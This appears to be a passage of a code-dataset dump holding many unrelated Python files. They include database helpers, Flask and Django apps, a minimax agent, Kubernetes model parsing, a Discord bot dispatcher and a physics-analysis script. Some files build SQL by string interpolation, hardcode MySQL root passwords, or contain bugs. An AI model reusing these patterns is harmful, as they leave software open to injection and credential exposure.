pd.DataFrame(arr)\n df = df.drop_duplicates(subset=['TeZheng_Guid', 'TeZheng_Name'])\n df = self.make_guid_by_index(df.copy(), 'tezheng_value', 11, drop_index=False)\n max_code = self.mysql_execute(\"SELECT MAX(TeZheng_Value) code FROM tezheng_value WHERE WuLiao_Guid='%s'\" % meta)\n max_code = max_code['code']\n if not max_code:\n max_code = 0\n df['TeZheng_Value'] = make_tezheng_code(df['index'], max_code)\n del df['index']\n try:\n df.to_sql('tezheng_value', con=self.conn, index=False, chunksize=1000, if_exists='append')\n df.rename(columns={'Guid': 'TeZhengValue_Guid'}, inplace=True)\n return df[['TeZhengValue_Guid', 'TeZheng_Guid', 'TeZheng_Attr_Name', 'TeZheng_Name', 'TeZheng_Value']]\n except:\n return pd.DataFrame()\n\n def add_specs_not_exist(self, df, specs, wuliao_guid):\n terminate = []\n for v in specs:\n df_1 = df[df['TeZheng_Attr_Name'] == v[0]]\n if df_1.index.size == 0:\n attr_guid = self.add_in_df_atrr({'WuLiao_Guid': wuliao_guid, 'Tezheng_Name': v[0]})\n if not attr_guid:\n continue\n terminate.append({'WuLiao_Guid': wuliao_guid, 'TeZheng_Guid': attr_guid,\n 'TeZheng_Attr_Name': v[0], 'TeZheng_Name': v[1]})\n continue\n df_2 = df_1[df_1['TeZheng_Name'] == v[1]]\n if df_2.index.size == 0:\n terminate.append({'WuLiao_Guid': wuliao_guid, 'TeZheng_Guid': df_1['TeZheng_Guid'][0],\n 'TeZheng_Attr_Name': v[0], 'TeZheng_Name': v[1]})\n # 添加特征项时发生错误的attr\n if len(terminate) > 0:\n df_3 = self.add_in_tezheng_value(terminate, wuliao_guid)\n if df_3.index.size > 0:\n df = df.append(df_3, sort=False)\n return df\n\n def make_spec_df(self, wuliao_guid, arr):\n spec_values = map(lambda x: x[1], arr)\n names = ','.join(map(lambda x: \"'%s'\" % x, spec_values))\n sql = \"select Guid TeZhengValue_Guid,TeZheng_Guid,TeZheng_Attr_Name,TeZheng_Name,TeZheng_Value from \" \\\n \"tezheng_value where WuLiao_Guid='%s' and TeZheng_Name in (%s)\" % (wuliao_guid, names)\n sql = sql.replace('\\\\', '\\\\\\\\').replace('\\\"', '\\\\\\\"').replace('%', '%%')\n df = pd.read_sql(sql, self.conn)\n if df.index.size == 0:\n return df\n df_ = pd.DataFrame()\n for v in arr:\n df_ = df_.append(df[(df['TeZheng_Attr_Name'] == v[0]) & (df['TeZheng_Name'] == v[1])])\n return df_\n","sub_path":"lib/query_info.py","file_name":"query_info.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568572801","text":"\"\"\"\n=============\n配置文件\n=============\n\"\"\"\n\nimport os\n\nDEBUG = True if os.environ.get('FLASK_DEBUG', 'no') == 'yes' else False\nSQLALCHEMY_DATABASE_URI = os.environ.get(\n 'SQLALCHEMY_DATABASE_URI',\n 'mysql+pymysql://root:hello_world@127.0.0.1:3306/project_a')\n\nSQLALCHEMY_TRACK_MODIFICATIONS = True if os.environ.get(\n 'SQLALCHEMY_TRACK_MODIFICATIONS', 'yes') == 'yes' else False\n","sub_path":"aivptr/project-a/web/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653301093","text":"from django.http.response import HttpResponseNotFound, HttpResponseRedirect\nfrom todoApp.models import Todo\nfrom django.shortcuts import render\n\n# Create your views here.\n\ndef homepage(request):\n todos = Todo.objects.all()\n return render(request, 'index.html', {'todos':todos})\n\ndef create(request):\n if request.method == 'POST':\n todo = Todo()\n todo.title = request.POST.get('title')\n todo.description = request.POST.get('description')\n todo.save()\n return HttpResponseRedirect('/')\n\ndef edit(request, id):\n try:\n todo = Todo.objects.get(id = id)\n if request.method == 'POST':\n todo.title = request.POST.get('title')\n todo.description = request.POST.get('description')\n return HttpResponseRedirect('/')\n else:\n return render(request, 'edit.html', {'todo':todo})\n except Todo.DoesNotExist:\n return HttpResponseNotFound\n (\"

Задача не найдена

\")","sub_path":"todo/todoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429105907","text":"#!/usr/bin/env python\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%Y-%m-%d %I:%M:%S %p') # optional: filename=\"log.txt\"\n\n\nclass TheManager:\n def __enter__(self):\n print('Before')\n\n def __exit__(self, type, value, traceback):\n print('After')\n\nwith TheManager() as something:\n print('Doing something')\n\n\nlogging.info(\"info\")\nlogging.debug(\"debug\")\nlogging.error(\"error\")\nlogging.warning(\"warning\")\nlogging.critical(\"critical\")\n\n","sub_path":"Python/logging/logging_and_with.py","file_name":"logging_and_with.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412836420","text":"import sys\n\n\ndef get_minmax_move(board, max_depth=2):\n # Get the result of a minimax run and return the move\n score, move = minmax(board, board.player, max_depth, 0)\n return move\n\n\ndef minmax(board, player, max_depth, current_depth):\n # Check if we're done recursing\n if board.game_is_over() or current_depth == max_depth:\n return board.evaluate(player), (None, None)\n\n best_move = (None, None)\n if board.current_player() == player:\n best_score = -sys.maxint + 1\n else:\n best_score = sys.maxint\n moves_x, moves_y = board.get_moves()\n\n # Go through each move\n for i in range(moves_x.size):\n new_board = board.copy()\n new_board.make_move((moves_x[i], moves_y[i]))\n\n # Recurse\n current_score, current_move = minmax(new_board, player, max_depth, current_depth + 1)\n\n # Update the best score\n if board.current_player() == player:\n if current_score > best_score:\n best_score = current_score\n best_move = (moves_x[i], moves_y[i])\n else:\n if current_score < best_score:\n best_score = current_score\n best_move = (moves_x[i], moves_y[i])\n\n # Return the score and the best move\n return best_score, best_move\n","sub_path":"Project_2/TicTacToe_and_Minmax/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314239150","text":"# Given 3 intns, return sum. But if any value is a teen, it doesn't count (unless its 15 or 16). \n# Write helper function fix_teen that takes in int and returns value fiexed for teen rule to avoid repeating code 3 times \n\n\ndef fix_teen(n):\n if n in [12,13,14,17,18,19]:\n return 0\n return n\n\ndef no_teen_sum(a,b,c):\n return fix_teen(a) + fix_teen(b) + fix_teen(c)\n\n\n\n# print(fix_teen(15)) # 15\n# print(fix_teen(16)) # 16\n# print(fix_teen(13)) # 0\n# print(fix_teen(19)) # 0\n\nprint(no_teen_sum(1,2,3)) # 6 \nprint(no_teen_sum(1,16,1)) # 18 \nprint(no_teen_sum(2,13,1)) # 3 \nprint(no_teen_sum(13,15,13)) # 15 ","sub_path":"CodingBat/logic2/no_teen_sum.py","file_name":"no_teen_sum.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124589371","text":"import datetime\nfrom typing import Any, Dict\n\nimport kubernetes\nfrom dagster import check\nfrom dagster.utils import frozendict\nfrom dateutil.parser import parse\nfrom kubernetes.client import ApiClient\n\n\ndef _k8s_value(data, classname, attr_name):\n if classname in ApiClient.NATIVE_TYPES_MAPPING:\n klass = ApiClient.NATIVE_TYPES_MAPPING[classname]\n else:\n klass = getattr(kubernetes.client.models, classname)\n\n if klass in ApiClient.PRIMITIVE_TYPES:\n return klass(data)\n elif klass == object:\n return data\n elif klass == datetime.date:\n return parse(data).date()\n elif klass == datetime.datetime:\n return parse(data)\n else:\n if not isinstance(data, (frozendict, dict)):\n raise Exception(\n f\"Attribute {attr_name} of type {klass.__name__} must be a dict, received {data} instead\"\n )\n\n return k8s_model_from_dict(klass, data)\n\n\n# Heavily inspired by kubernetes.client.ApiClient.__deserialize_model, with more validation\n# that the keys and values match the expected format. Expects atribute names to be in camelCase.\ndef k8s_model_from_dict(model_class, model_dict: Dict[str, Any]):\n check.dict_param(model_dict, \"model_dict\")\n kwargs = {}\n\n expected_keys = set(model_class.attribute_map.values())\n invalid_keys = set(model_dict).difference(expected_keys)\n\n if len(invalid_keys):\n raise Exception(f\"Unexpected keys in model class {model_class.__name__}: {invalid_keys}\")\n\n for attr, attr_type in model_class.openapi_types.items():\n # e.g. config_map => configMap\n mapped_attr = model_class.attribute_map[attr]\n if mapped_attr in model_dict:\n value = model_dict[mapped_attr]\n kwargs[attr] = _k8s_value(value, attr_type, mapped_attr)\n\n return model_class(**kwargs)\n","sub_path":"python_modules/libraries/dagster-k8s/dagster_k8s/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414882256","text":"import pytest\nimport re\n\n\n@pytest.fixture()\ndef GetCandidateVersion(Command):\n def CandidateVersion(pkg):\n \"\"\" Check the output of \"apt-cache poicy \"\n to determine the candidate version for a package.\n\n Args:\n Command - module to run apt-cache policy\n pkg - name of the package you want to check candidates for\n\n Returns:\n Candidate version for pkg\n \"\"\"\n policy = Command.check_output(\"apt-cache policy {}\".format(pkg))\n candidates = re.search(\"Candidate: (.*)\", policy)\n if candidates:\n return candidates.groups(0)[0]\n else:\n return \"\"\n return CandidateVersion\n\n\ndef test_pip_exists(Package, GetCandidateVersion):\n \"\"\" Ensure the candidate version of pip is installed.\n\n Args:\n Package - Module to determine package install status and version\n GetPolicy - Get version of candidate package\n \"\"\"\n pip = Package(\"python-pip\")\n pip_candidate_version = GetCandidateVersion(\"python-pip\")\n assert pip.is_installed\n assert pip.version == pip_candidate_version\n","sub_path":"ci/ansible/roles/azavea.pip/tests/test_pip.py","file_name":"test_pip.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539859364","text":"from notbook import show_plot\nfrom bokeh.plotting import figure\nfrom bokeh.sampledata.iris import flowers\n\n\"\"\"md\n# This is a title\n\nThis should be a **section** of markdown.\n\nHere we have bullets:\n\n* one bullet\n* another bullet\n\"\"\"\n\n# { Testing Section\nquestion = 422\nfoobar = 123\nprint('answer:', question + 2)\n# }\n\n\"\"\"md\nanother section of **markdown**.\n\"\"\"\n\nprint('this should be shown as a standalone code block')\nprint({'foo': 'bar', 2: 3, 4: list(range(5)), (1, 2): range(10)}, [1, 2, 3])\nprint('last part of print')\n\n\"\"\"md\ndifferent\n\"\"\"\nprint(1, 2, '3')\n\n# {\nimport re\nRE_URI_NOT_ALLOWED = re.compile(r'[^a-zA-Z0-9_\\-/.]')\nRE_HTML_SYMBOL = re.compile(r'&(?:#\\d{2,}|[a-z0-9]{2,});')\nRE_TITLE_NOT_ALLOWED = re.compile(r'[^a-z0-9_\\-]')\nRE_REPEAT_DASH = re.compile(r'-{2,}')\n\n\ndef slugify(v, *, path_like=True):\n v = v.replace(' ', '-').lower()\n if path_like:\n v = RE_URI_NOT_ALLOWED.sub('', v)\n else:\n v = RE_HTML_SYMBOL.sub('', v)\n v = RE_TITLE_NOT_ALLOWED.sub('', v)\n return RE_REPEAT_DASH.sub('-', v).strip('_-')\n# } useful bit of code about this\n\n\ncolormap = {'setosa': 'red', 'versicolor': 'green', 'virginica': 'blue'}\ncolors = [colormap[x] for x in flowers['species']]\n\np = figure(title='Iris Morphology')\np.xaxis.axis_label = 'Petal Length'\np.yaxis.axis_label = 'Petal Width'\n\np.circle(flowers['petal_length'], flowers['petal_width'], color=colors, fill_alpha=0.2, size=10)\n\nshow_plot(p)\n","sub_path":"demo-script.py","file_name":"demo-script.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465975735","text":"#!/usr/bin/env python3.5\n''' The interface between textual commands and the things that process them.\n'''\n\nimport logging\n\n# Commands we want to register should be imported here\nfrom handlers import handlerbase, eightball, custom_message\n\nclass Dispatcher:\n ''' Handles dispatching of commands.\n '''\n client = None\n handler_dict = {}\n\n def register(self, command, handler):\n ''' Associate a command with a handler object that implements the handlers.Handler class,\n so that users can type the command and have the bot respond to it.\n '''\n # Error handling\n if command in self.handler_dict:\n logging.error('Dispatcher: command %s already registered, cannot reregister\\n', command)\n return 1\n if not isinstance(handler, handlerbase.HandlerBase):\n logging.error('Dispatcher: handler object does not implement the HandlerBase class\\n')\n return 1\n # Register command\n self.handler_dict[command] = handler\n\n def deregister(self, command):\n ''' Dissociate a command and handler.\n '''\n # Error handling\n if not command in self.handler_dict:\n logging.error('Dispatcher: command %s is not registered\\n', command)\n return 1\n # Deregister command\n del self.handler_dict[command]\n return 0\n\n async def dispatch(self, message):\n ''' Identifies if a message represents a bot command,\n and if so, dispatches the command to the handler's process() method.\n '''\n # Not sure if empty strings are valid messages, but doesn't hurt to check here\n if not message.content:\n return\n # Check if the message begins with any command;\n for command, handler in self.handler_dict.items():\n if message.content.startswith(command):\n # Because we're not in control of what handlers do, it's possible they can\n # throw almost any exception. We should be defensive here, because we don't\n # want our bot to crash if a command fails, but we do want to see what\n # went wrong, so write the command and exception to stderr.\n try:\n await handler.process(self.client, message)\n except Exception as err:\n logging.error('Handler threw exception %s on message: \\'%s\\'\\n', \\\n (type(err).__name__, message.content))\n logging.error('Exception: %s\\n', err)\n break\n\n def __init__(self, client, config_obj):\n ''' Get a reference to the discord.Client()\n and also register commands\n '''\n self.client = client\n self.register('!8ball', eightball.Eightball())\n # Register custom command-message bindings from config\n if isinstance(config_obj.custom_messages, dict):\n for custom_command, reply_messages in config_obj.custom_messages.items():\n self.register(custom_command, custom_message.CustomMessage(reply_messages))\n","sub_path":"lib/dispatch.py","file_name":"dispatch.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477644876","text":"#coding=utf-8\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport copy\n\nfrom jinja2.filters import escape\nfrom flask import Flask, render_template, url_for, request\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom columns import *\nfrom rows import *\nfrom utils import *\n\n\n## Table\nclass TableData(object):\n def __init__(self, data, table):\n self.queryset = data\n self.table = table\n\n if self.table.order_by_list:\n self.ordering()\n self.page_obj = self.queryset.paginate(page=self.table.page,\n per_page=self.table.per_page)\n self.page_obj.total_items = self.queryset.count()\n self.list = self.page_obj.items\n \n def ordering(self):\n model = self.table._meta.model\n \n for order_by in self.table.order_by_list:\n order = 'asc'\n if order_by[0] == '-':\n order = 'desc'\n order_by = order_by[1:]\n a = A(\"%s.%s\" % (order_by, order)) # i.e. \"name.desc\"\n self.queryset = self.queryset.order_by(a.resolve(model))\n\n def __iter__(self):\n return iter(self.list)\n\n def __len__(self):\n return len(self.list)\n\n def __getitem__(self, key):\n data = self.list[key]\n if isinstance(key, slice):\n return type(self)(data, self.table, self.page, self.per_page)\n else:\n return data\n\n\nclass TableMeta(type):\n def __new__(cls, name, bases, attrs):\n\n attrs[\"_meta\"] = opts = TableOptions(attrs.get(\"Meta\", None))\n columns = [(name_, attrs.pop(name_)) for name_, column in attrs.items()\n if isinstance(column, Column)]\n columns.sort(lambda x, y: cmp(x[1].creation_counter, y[1].creation_counter))\n\n parent_columns = []\n for base in bases[::-1]:\n if hasattr(base, \"base_columns\"):\n parent_columns = base.base_columns.items() + parent_columns\n\n attrs[\"base_columns\"] = SortedDict(parent_columns)\n attrs[\"base_columns\"].update(SortedDict(columns))\n\n return super(TableMeta, cls).__new__(cls, name, bases, attrs)\n\n\nclass TableOptions(object):\n\n def __init__(self, options=None):\n super(TableOptions, self).__init__()\n self.order_by_list = getattr(options, 'order_by_list', None)\n self.model = getattr(options, 'model', None)\n if self.order_by_list and self.model is None:\n raise ValueError(\"if you give *order_by* you should give *model* too!\")\n self.per_page = getattr(options, 'per_page', None)\n self.url_makers = getattr(options, 'url_makers', None)\n # print '(TableOptions)self.per_page::', self.per_page\n \n\nclass Table(object):\n __metaclass__ = TableMeta\n TableDataClass = TableData\n\n def __init__(self, data, page=None, per_page=None, order_by=None,\n sequence=None, request=None, template=None,):\n \n # Sequence\n self.sequence = sequence\n if sequence is not None:\n self._sequence = Sequence(sequence)\n self._sequence.expand(self.base_columns.keys())\n else:\n self._sequence = Sequence(('...',))\n self._sequence.expand(self.base_columns.keys())\n self.columns = BoundColumns(self)\n\n if request is None:\n raise ValueError(\"request is required\")\n self.request = request\n\n # Order By\n main_order_by = order_by if order_by else request.args.get('order_by', None)\n self.order_by_list = self._meta.order_by_list\n if self.order_by_list and main_order_by is not None:\n for i in range(len(self.order_by_list)):\n if (self.order_by_list[i] == main_order_by\n or self.order_by_list[i] == main_order_by[1:]\n or main_order_by == self.order_by_list[i][1:]):\n self.order_by_list.pop(i)\n break\n self.order_by_list.insert(0, main_order_by)\n \n self.page = page or request.args.get('page', 1, type=int)\n self.per_page = (per_page or request.args.get('per_page', None, type=int)\n or self._meta.per_page or 20)\n\n self.data = self.TableDataClass(data=data, table=self)\n self.rows = BoundRows(self.data)\n self.template = template\n\n # print 'self._sequence', self._sequence\n\n\n @property\n def sequence(self):\n return self._sequence\n\n @sequence.setter\n def sequence(self, value):\n if value:\n value = Sequence(value)\n value.expand(self.base_columns.keys())\n self._sequence = value\n\n @property\n def page_obj(self):\n return self.data.page_obj\n\n @property\n def page_url(self):\n request = self.request\n req_args = request.args.to_dict()\n uri = request.url_root + request.path[1:]\n def func(page, order_by=None):\n req_args['page'] = page\n old_order_by = req_args.get('order_by', None)\n if order_by:\n if old_order_by == order_by:\n order_by = '-' + order_by\n req_args['order_by'] = order_by\n return uri + '?' + '&'.join(['%s=%s'%(k, v)\n for k, v in req_args.items()])\n return func\n\n def as_html():\n pass\n\n\nif __name__ == '__main__':\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:yawen00@localhost/test_table'\n app.config['DEBUG'] = True\n db = SQLAlchemy(app)\n\n class User(db.Model):\n __tablename__ = 'users3'\n\n id = db.Column(db.Integer, primary_key=True)\n parent_id = db.Column(db.Integer, db.ForeignKey('users3.id'))\n email = db.Column(db.String(50))\n name = db.Column(db.String(40))\n age = db.Column(db.Integer(40))\n bit = db.Column(db.String(30))\n\n parent = db.relationship(\"User\", remote_side=[id])\n\n def __init__(self, parent_id, email, name, age, bit):\n self.parent_id = parent_id\n self.email = email\n self.name = name\n self.age = age\n self.bit = bit\n\n # db.create_all()\n\n class UserTable(Table):\n check = CheckBoxColumn()\n parent = LinkColumn('user', accessor=\"parent.name\")\n email = EmailColumn(orderable=True)\n name = Column()\n age = Column(orderable=True)\n bit = Column()\n\n class Meta():\n per_page = 3\n order_by_list = ['name', '-age']\n model = User # just for order by\n url_makers = {'parent': lambda record: url_for('user', id=getattr(record, 'id', 1),\n mk='QUERY_STRING')}\n\n\n ## views\n @app.route(\"/user//\")\n def user(id):\n user = User.query.get_or_404(id)\n return ', '.join([user.name, str(user.age), 'Parent:', user.parent.name, user.bit])\n\n @app.route(\"/table\")\n def index():\n # print 'url_for::', url_for('index', a=3, b=2, _external=True)\n page = request.args.get('page', 1, type=int)\n table = UserTable(User.query, page=page, request=request)\n return render_template('test_table.html', table=table)\n \n app.run(host=\"0.0.0.0\", port=5001)\n","sub_path":"tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100973149","text":"##################\n\"\"\"\n\nauthor: John Hossler\n\nfile: binsearch.py\n\nCS260 PROJECT#6 2/12/2015\n\nBinSearchTree is a binary search tree implemented as a dictionary. This class was created for the sole purpose of helping with project6 for CS 260.\n\nOffers insert and returnNode capabilities\n\n\"\"\"\n##################\n\nclass BSTNode:\n \n def __init__(self,ident = None,minHeap = None,maxHeap = None,nex = None,left = None,right = None):\n self.ident = ident\n self.minHeap = minHeap\n self.maxHeap = maxHeap\n self.nex = nex\n self.left = left\n self.right = right\n\nclass BinSearchTree:\n\n def __init__(self,root = None):\n self.root = root\n\n def insert(self,ident,Min,Max):\n if self.root == None:\n self.root = BSTNode(ident,Min,Max)\n return\n\n def recurse(node):\n if ident < node.ident:\n if node.left == None:\n node.left = BSTNode(ident,Min,Max)\n else:\n recurse(node.left)\n else:\n if node.right == None:\n node.right = BSTNode(ident,Min,Max)\n else:\n recurse(node.right)\n \n recurse(self.root)\n\n def returnNode(self,ident):\n def recurse(node):\n if ident < node.ident:\n if node.left == None:\n return\n elif node.left.ident == ident:\n return node.left\n else:\n return recurse(node.left)\n else:\n if node.right == None:\n return\n elif node.right.ident == ident:\n return node.right\n else:\n return recurse(node.right)\n\n if self.root == None:\n return\n elif self.root.ident == ident:\n return self.root\n else:\n return recurse(self.root)\n\n def find(self,ident):\n def recurse(node):\n if ident < node.ident:\n if node.left == None:\n return False\n elif node.left.ident == ident:\n return True\n else:\n return recurse(node.left)\n else:\n if node.right == None:\n return False\n elif node.right.ident == ident:\n return True\n else:\n return recurse(node.right)\n\n if self.root == None:\n return False\n elif self.root.ident == ident:\n return True\n else:\n return recurse(self.root)\n","sub_path":"projects/project6/binsearch.py","file_name":"binsearch.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552009518","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# $Id$ \n# =============================================================================\n## @file TestTransporters.py\n#\n# Compare CPU performance for particle transporters \n#\n# This file is a part of \n# Bender project\n# ``Python-based Interactive Environment for Smart and Friendly \n# Physics Analysis''\n#\n# The package has been designed with the kind help from\n# Pere MATO and Andrey TSAREGORODTSEV. \n# And it is based on the \n# LoKi project:\n# ``C++ ToolKit for Smart and Friendly Physics Analysis''\n#\n# By usage of this code one clearly states the disagreement \n# with the smear campaign of Dr.O.Callot et al.: \n# ``No Vanya's lines are allowed in LHCb/Gaudi software.''\n#\n# @author Vanya BELYAEV Ivan.Belyaev@itep.ru\n# @date 2016-01-14\n#\n# $Revision$\n# Last modification $Date$\n# by $Author$\n# =============================================================================\n\"\"\"Compare CPU performance for particle transporters \n\noooooooooo. .o8 \n`888' `Y8b \\\"888 \n 888 888 .ooooo. ooo. .oo. .oooo888 .ooooo. oooo d8b \n 888oooo888' d88' `88b `888P\\\"Y88b d88' `888 d88' `88b `888\\\"\\\"8P \n 888 `88b 888ooo888 888 888 888 888 888ooo888 888 \n 888 .88P 888 .o 888 888 888 888 888 .o 888 \no888bood8P' `Y8bod8P' o888o o888o `Y8bod88P\\\" `Y8bod8P' d888b \n\nThis file is a part of BENDER project:\n ``Python-based Interactive Environment for Smart and Friendly Physics Analysis''\n\nThe project has been designed with the kind help from\nPere MATO and Andrey TSAREGORODTSEV. \n\nAnd it is based on the LoKi project:\n ``C++ ToolKit for Smart and Friendly Physics Analysis''\n\nBy usage of this code one clearly states the disagreement \nwith the smear campaign of Dr.O.Callot et al.: \n ``No Vanya's lines are allowed in LHCb/Gaudi software.''\n\n $Revision$\nLast modification $Date$\n by $Author$\n\"\"\"\n# =============================================================================\n__author__ = \" Vanya BELYAEV Ivan.Belyaev@itep.ru \"\n__date__ = \" 2016-01-15 \" \n__version__ = \"$Revision$ \"\n# ============================================================================= \n## optional logging\n# =============================================================================\nfrom Bender.Logger import getLogger\nif '__main__' == __name__ : logger = getLogger ( 'TestTransporters' )\nelse : logger = getLogger ( __name__ )\n# =============================================================================\n## import everything from bender \nfrom Bender.Main import *\nfrom GaudiKernel.SystemOfUnits import cm , GeV\n# =============================================================================\n## @class TransportersTest\n# Compare CPU performance for particle transporters \n# @author Vanya BELYAEV Ivan.Belyaev@itep.ru\n# @date 2016-01-14\nclass TransportersTest(Algo):\n \"\"\"\n Compare CPU performance for particle transporters \n \"\"\"\n def initialize ( self ) :\n \n sc = Algo.initialize ( self )\n if sc.isFailure() : return sc\n \n IPT = cpp.IParticleTransporter\n \n self.tr1 = self.tool( IPT ,'ParticleTransporter/PT1' , parent=self )\n if not self.tr1 : return FAILURE\n \n self.tr2 = self.tool( IPT ,'DaVinci::ParticleTransporter/PT2' , parent=self )\n if not self.tr2 : return FAILURE\n \n self.tr3 = self.tool( IPT ,'DaVinci::ParticleTransporter/PT3' , parent=self )\n if not self.tr3 : return FAILURE \n\n self.zpos = [ 5 * i * cm for i in range ( -10 , 10 ) ]\n ## self.zpos += [ 20 * i * cm for i in range ( 3 , 10 ) ]\n \n for t in self.tr1,self.tr2,self.tr3 :\n sc = cpp.Gaudi.Utils.setProperty( t , 'MeasureCPUPerformance' , 'true' )\n if sc.isFailure() :\n self.Error('CANNOT set property !!' )\n self.nevt = 0 \n return sc\n \n def finalize ( self ) :\n \n del self.tr1\n del self.tr2\n del self.tr3\n\n return Algo.finalize ( self ) \n\n def cpu ( self , particles, transporter , tag ) :\n\n csvc = self.chronoSvc().get() \n particle = LHCb.Particle() \n \n chrono = cpp.Chrono( csvc , tag )\n for z in self.zpos :\n if -30 * cm < z < 100 * cm : \n for p in particles:\n sc = transporter.transport ( p , z , particle )\n\n del chrono\n \n \n ## the main 'analysis' method \n def analyse( self ) : ## IMPORTANT! \n \"\"\"\n The main 'analysis' method\n \"\"\"\n\n self.nevt += 1\n \n particles = self.select('all', PALL )\n if not particles : \n return self.Warning( \"No particles are found\", SUCCESS )\n \n \n if self.nevt < 10 :\n\n if 1<= len(particles) :\n \n part0 = particles[0]\n part_ = LHCb.Particle()\n for z in self.zpos :\n if abs ( z ) < 10 * cm : \n self.tr3.transport ( part0 , z , part_ )\n \n self.cpu ( particles , self.tr1 , 'tr1-0' )\n self.cpu ( particles , self.tr2 , 'tr2-0' )\n \n else :\n \n #self.cpu ( particles , self.tr1 , 'tr1-1' )\n #self.cpu ( particles , self.tr2 , 'tr2-1' )\n \n self.cpu ( particles , self.tr1 , 'tr1-2' )\n self.cpu ( particles , self.tr2 , 'tr2-2' )\n \n ## \n return SUCCESS ## IMPORTANT!!! \n# =============================================================================\n\n# =============================================================================\n## The configuration of the job\ndef configure ( inputdata , ## the list of input files \n catalogs = [] , ## xml-catalogs (filled by GRID)\n castor = False , ## use the direct access to castor/EOS ? \n params = {} ) :\n \n ## import DaVinci \n from Configurables import DaVinci\n ## delegate the actual configuration to DaVinci\n dv = DaVinci ( DataType = '2012' ,\n InputType = 'DST' )\n \n ## add the name of Bender algorithm into User sequence sequence \n alg_name = 'Transporters'\n dv.UserAlgorithms += [ alg_name ]\n \n from StandardParticles import StdLooseKaons, StdLoosePions\n kaons = StdLooseKaons.outputLocation()\n pions = StdLoosePions.outputLocation()\n \n ## define the input data\n setData ( inputdata , catalogs , castor )\n \n ## get/create application manager\n gaudi = appMgr() \n \n ## (1) create the algorithm with given name \n alg = TransportersTest (\n alg_name ,\n Inputs = [ kaons, pions ]\n )\n \n \n return SUCCESS \n# =============================================================================\n\n# =============================================================================\n## Job steering \nif __name__ == '__main__' :\n\n logger.info ( 80*'*' ) \n logger.info ( __doc__ ) \n logger.info ( ' Author : %s ' % __author__ ) \n logger.info ( ' Version : %s ' % __version__ ) \n logger.info ( ' Date : %s ' % __date__ ) \n logger.info ( 80*'*' ) \n \n ## job configuration\n ## BKQuery ( '/LHCb/Collision12/Beam4000GeV-VeloClosed-MagDown/Real Data/Reco14/Stripping20/90000000/DIMUON.DST' )\n inputdata = [\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0001/00020198_00012742_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0001/00020198_00015767_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0000/00020198_00007306_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0001/00020198_00016402_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0000/00020198_00002692_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020738/0000/00020738_00005943_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020350/0000/00020350_00008129_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00021211/0000/00021211_00000461_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00021211/0000/00021211_00001009_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020350/0000/00020350_00001011_1.dimuon.dst',\n ]\n configure( inputdata , castor = True )\n \n ## event loop \n run(500)\n\n# =============================================================================\n# The END\n# =============================================================================\n\n\n","sub_path":"Bender/Ex/BenderExample/python/BenderExample/Transporters.py","file_name":"Transporters.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498280342","text":"\"\"\"Elenca gli impianti della lessinia\"\"\"\nQUOTA_PARTENZA = 13\nQUOTA_ARRIVO = 14\nSEP = \",\"\n\n\ndef process_file(filename, alt_min=0, alt_max=10000):\n file = open(filename)\n header = True\n \n for line in file:\n if header:\n header = False\n else:\n values = line.split(SEP)\n quota_partenza = values[QUOTA_PARTENZA]\n quota_arrivo = values[QUOTA_ARRIVO]\n \n if quota_partenza.strip() and quota_arrivo.strip():\n if int(quota_partenza) >= alt_min and int(quota_arrivo) <= alt_max:\n print(line, end=\"\")\n file.close()\n\nif __name__ == \"__main__\":\n filename = \"lista_impianti.csv\"\n process_file(filename, 1000, 